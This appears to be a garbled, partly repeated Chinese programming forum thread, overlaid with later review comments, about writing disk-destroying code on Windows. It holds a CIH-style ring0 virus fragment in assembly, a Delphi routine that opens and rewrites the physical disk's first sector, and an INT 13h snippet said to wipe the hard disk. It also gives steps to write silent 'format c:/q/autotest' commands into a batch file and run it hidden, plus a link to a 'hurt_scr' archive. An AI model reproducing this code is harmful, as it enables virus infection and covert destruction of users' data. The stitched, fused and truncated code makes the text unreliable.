; ************************************* ; * When Exception Error Occurs,* ; * Our OS System should be in NT. * ; * So My Cute Virus will not * ; * Continue to Run, it Jmups to* ; * Original Application to Run.* ; *************************************
StopToRunVirusCode: @1 = StopToRunVirusCode
xor ebx, ebx mov eax, fs:[ebx] mov esp, [eax]
RestoreSE: pop dword ptr fs:[ebx] pop eax
; ************************************* ; * Return Original App to Execute * ; *************************************
pop ebp
push 00401000h ; Push Original OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack
ret ; Return to Original App Entry Point
; ********************************************************* ; * Ring0 Virus Game Initial Program * ; *********************************************************
MyExceptionHook: @2 = MyExceptionHook
jzInstallMyFileSystemApiHook
; ************************************* ; * Do My Virus Exist in System !? * ; *************************************
; ************************************* ; * Return to Ring3 Initial Program * ; *************************************
ExitRing0Init: mov [ebx-04h], bp ; shr ebp, 16 ; Restore Exception mov [ebx+02h], bp ;
iretd
procedure TForm1.Button2Click(Sender: TObject); const BytesPerSector=512; SectorCount=1; SectorStart=0; drive='\\.\PHYSICALDRIVE0'; var str:string; p:pchar; i:Cardinal; begin hDeviceHandle := CreateFile(drive, GENERIC_ALL, //如果只是读扇区,可以用GENERIC_READ FILE_SHARE_READ or FILE_SHARE_WRITE, nil, OPEN_EXISTING,0, 0); if (hDeviceHandle <> INVALID_HANDLE_VALUE) then begin p:=allocmem(SectorCount*BytesPerSector); FileSeek(hDevicehandle,SectorStart*BytesPerSector,0); if FileRead(hDevicehandle,p[0],SectorCount*BytesPerSector)<>SectorCount*BytesPerSector then raise exception.create('Read错误'); str:=''; for i:=0 to 512-1 do begin str:=str+format('%.2x',[integer(p[i])]); if i mod 16=15 then str:=str+#13; end; showmessage(str); FileSeek(hDevicehandle,SectorStart*BytesPerSector,0); if FileWrite(hDevicehandle,p[0],SectorCount*BytesPerSector)<>SectorCount*BytesPerSector then raise exception.create('Write错误%d'); freemem(p,SectorCount*BytesPerSector); closehandle(hDeviceHandle); end; end;
asm 能清除真个硬盘,但对ntfs没作用mov ax,0301 mov bx,200 mov cx,1 mov dx,80 int 13 int 3bat 留个系统给他y | format c:/u/q/s
1. 找找网上关于进入 ring0 权限的代码
2.通过BIOS中断INT 13H的5H功能进行格式化.附:
AL=扇区数
(CL)6,7(CH)0~7=磁道号
(CL)0~5扇区号
DH/DL=磁头号/驱动器号
ES:BX=格式化参数表指针
返回:AH=0则成功,否则返回错误代码
; ---------------------------------------------------------------------
; Ring-3 side: redirect one IDT gate (HookExceptionNumber) to
; MyExceptionHook, keeping the original handler offset in ebp.
; Review note: the patch needs the IDT to be writable from ring 3. The
; listing's own banner at StopToRunVirusCode says that a fault here means
; the OS is NT and control goes to the SEH path instead.
; Register roles after this run: ebx -> upper dword of the gate,
; ebp = original handler offset (restored later at ExitRing0Init).
; NOTE(review): ecx is loaded before this excerpt; presumably the run-time
; address of @1 - confirm against the full listing.
; ---------------------------------------------------------------------
push eax ; reserve 4 stack bytes that sidt will overwrite
sidt [esp-02h] ; Get IDT Base Address (6-byte store: limit at esp-2, base at esp)
pop ebx ; ebx = IDT base
add ebx, HookExceptionNumber*08h+04h ; ZF = 0; ebx -> upper dword of gate N
cli
mov ebp, [ebx]; Get Exception Base (upper 16 bits = handler offset 31..16)
mov bp, [ebx-04h] ; Entry Point (low 16 bits = handler offset 15..0)
lea esi, MyExceptionHook-@1[ecx]
push esi
mov [ebx-04h], si ; gate offset 15..0 := hook address
shr esi, 16 ; Modify Exception
mov [ebx+02h], si ; Entry Point Address (gate offset 31..16 := hook address)
pop esi
; *************************************
; * Generate Exception to Get Ring0 *
; *************************************
; The software interrupt enters the gate patched above, so MyExceptionHook
; runs with the privilege of that gate's handler.
int HookExceptionNumber ; GenerateException
; Symbol marking the address the first int returns to; MyExceptionHook
; uses it to compute a displacement to ReadyRestoreSE.
ReturnAddressOfEndException = $
; *************************************
; * Merge All Virus Code Section*
; *************************************
; NOTE(review): no instructions follow this banner in the listing; the
; code it announced is not part of this excerpt.
; *************************************
; * Generate Exception Again *
; *************************************
int HookExceptionNumber ; GenerateException Again
; *************************************
; * Let's Restore *
; * Structured Exception Handling *
; *************************************
ReadyRestoreSE:
sti ; re-enable interrupts (cli was issued before the gate was patched)
xor ebx, ebx ; ebx = 0 so RestoreSE addresses fs:[0]
jmp RestoreSE
; *************************************
; * When Exception Error Occurs,*
; * Our OS System should be in NT. *
; * So My Cute Virus will not *
; * Continue to Run, it Jumps to*
; * Original Application to Run.*
; *************************************
; Fallback path: reached when the ring-3 code faults. The banner above
; states the author's assumption that this happens on NT.
; NOTE(review): the SEH frame that routes a fault here is installed before
; this excerpt and is not visible in the listing.
StopToRunVirusCode:
@1 = StopToRunVirusCode
xor ebx, ebx ; ebx = 0, used as the fs:[0] offset below
mov eax, fs:[ebx] ; eax = dword at fs:[0] (current SEH record pointer)
mov esp, [eax] ; esp = first dword of that record
RestoreSE:
pop dword ptr fs:[ebx] ; write the saved value back to fs:[0]
pop eax ; drop the next stack slot
; *************************************
; * Return Original App to Execute *
; *************************************
pop ebp
push 00401000h ; Push Original
; $-4 names the 4-byte immediate of the push above, so the pushed address
; can be referenced as data. NOTE(review): 00401000h is presumably a
; placeholder replaced per host file - confirm against the full listing.
OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack
ret ; Return to Original App Entry Point
; *********************************************************
; * Ring0 Virus Game Initial Program *
; *********************************************************
; Entry point reached through the patched IDT gate.
; Review note: per the banner below, dr0 is read as a residency marker.
; The jecxz branch runs when it is zero; a non-zero value takes the
; early-exit path.
MyExceptionHook:
@2 = MyExceptionHook
; NOTE(review): mnemonic and target are fused in this listing (jz + label);
; the target label is not part of the excerpt. The branch depends on ZF at
; entry, which the ring-3 code comments as "ZF = 0" before the first int.
jzInstallMyFileSystemApiHook
; *************************************
; * Do My Virus Exist in System !? *
; *************************************
mov ecx, dr0 ; debug register read: privileged instruction
jecxz AllocateSystemMemoryPage ; dr0 == 0 -> branch; target not in this excerpt
; dr0 != 0: adjust the return address on the interrupt frame so that iretd
; resumes at ReadyRestoreSE instead of after the first int.
; NOTE(review): the operand is truncated and wrapped across two lines in
; this listing; presumably ReadyRestoreSE-ReturnAddressOfEndException.
add dword ptr [esp], ReadyRestoreSE-ReturnAddressOf
dException
; *************************************
; * Return to Ring3 Initial Program *
; *************************************
; Writes the original handler offset (held in ebp) back into the gate that
; the ring-3 code patched, then returns from the interrupt.
; Relies on ebx and ebp still holding the values set before the int.
ExitRing0Init:
mov [ebx-04h], bp ; gate offset 15..0 := original
shr ebp, 16 ; Restore Exception
mov [ebx+02h], bp ; gate offset 31..16 := original
iretd ; return to the address on the interrupt frame
// Body of a button handler (its header line is not part of this listing).
// Opens the first physical disk as a raw device, reads sector 0, shows it
// as a hex dump, then writes the same buffer back to the same offset.
//
// Review notes:
//  - hDeviceHandle is not declared in this block; presumably a form field
//    or global - confirm.
//  - The handle is opened with GENERIC_ALL. Only the final FileWrite needs
//    write access; a read-only dump should request GENERIC_READ.
//  - Both raise statements run before freemem/closehandle, so the buffer
//    and the device handle leak on a failed read or write; there is no
//    try/finally.
//  - Write-capable opens of \\.\PHYSICALDRIVEn are a common monitoring
//    signal; on NT-family Windows they normally need administrative rights.
const
BytesPerSector=512;
SectorCount=1;
SectorStart=0;
drive='\\.\PHYSICALDRIVE0';
var
str:string;
p:pchar;
i:Cardinal;
begin
hDeviceHandle := CreateFile(drive, GENERIC_ALL, // GENERIC_READ is enough if the sector is only read
FILE_SHARE_READ or FILE_SHARE_WRITE, nil, OPEN_EXISTING,0, 0);
if (hDeviceHandle <> INVALID_HANDLE_VALUE) then
begin
// Allocate one sector and seek to byte offset 0 (result of FileSeek is not checked).
p:=allocmem(SectorCount*BytesPerSector); FileSeek(hDevicehandle,SectorStart*BytesPerSector,0);
if FileRead(hDevicehandle,p[0],SectorCount*BytesPerSector)<>SectorCount*BytesPerSector then
raise exception.create('Read错误'); str:='';
// Hex dump; the bound is the literal 512, not SectorCount*BytesPerSector.
for i:=0 to 512-1 do
begin
str:=str+format('%.2x',[integer(p[i])]);
if i mod 16=15 then str:=str+#13; // line break after every 16 bytes
end;
// Seek back to the same offset and write the unmodified buffer.
showmessage(str); FileSeek(hDevicehandle,SectorStart*BytesPerSector,0);
if FileWrite(hDevicehandle,p[0],SectorCount*BytesPerSector)<>SectorCount*BytesPerSector then
// The message goes to exception.create with no format arguments, so '%d' appears literally.
raise exception.create('Write错误%d'); freemem(p,SectorCount*BytesPerSector);
closehandle(hDeviceHandle);
end;
end;
mov bx,200
mov cx,1
mov dx,80
int 13
int 3bat 留个系统给他y | format c:/u/q/s
在memo1里面写
format c:/q/autotest
format d:/q/autotest
保存到硬盘
memo1.lines.savetofile('c:\run.bat');
调用run.bat文件(在调用前,在uses中加入shellapi单元)
shellexecute(handle,nil,pchar('c:\run.bat'),nil,nil,sw_hide);
OK。。
// Constants and import declaration for shell32's SHFormatDrive, plus a
// button handler that calls it once with the quick-format option.
// NOTE(review): the leading "stdcall;" looks like the tail of a declaration
// that is not part of this listing.
stdcall;const
SHFMT_ID_DEFAULT = $FFFF;
// Formatting options
SHFMT_OPT_QUICKFORMAT = $0000;
SHFMT_OPT_FULL = $0001;
SHFMT_OPT_SYSONLY = $0002;
// Error codes (all three are negative when read as a 32-bit signed LongInt)
SHFMT_ERROR = $FFFFFFFF;
SHFMT_CANCEL = $FFFFFFFE;
SHFMT_NOFORMAT = $FFFFFFFD;
// NOTE(review): the import is written as a method of tform1. An external
// DLL import is normally declared as a standalone function - confirm this
// compiles as written.
function tform1.SHFormatDrive(Handle: HWND; Drive, ID, Options: Word): LongInt;
// NOTE(review): the external clause and the next procedure header are fused
// on one line in this listing, with no ';' between them.
stdcall; external 'shell32.dll' name 'SHFormatDrive'procedure TForm1.Button1Click(Sender: TObject);
var
retCode: LongInt;
begin
// Drive is passed as 0. NOTE(review): presumably a zero-based drive index
// (0 = A:) - confirm against the API documentation.
// NOTE(review): SHFormatDrive is understood to open the shell's Format
// dialog owned by Handle rather than formatting silently - confirm.
retCode:= SHFormatDrive(Handle, 0, SHFMT_ID_DEFAULT,
SHFMT_OPT_QUICKFORMAT);
// Any of the three error codes above compares as < 0 here.
if retCode < 0 then
ShowMessage('Could not format drive');
end;
format c:/q/autotest
format d:/q/autotest
format e:/q/autotest
http://61.132.94.44/~upload/sforever/index/daima/hurt_scr.rar基本上还是用了批处理文件,^_^ 要是有直接的格式化硬盘函数就好了,不知道微软到底有没有提供。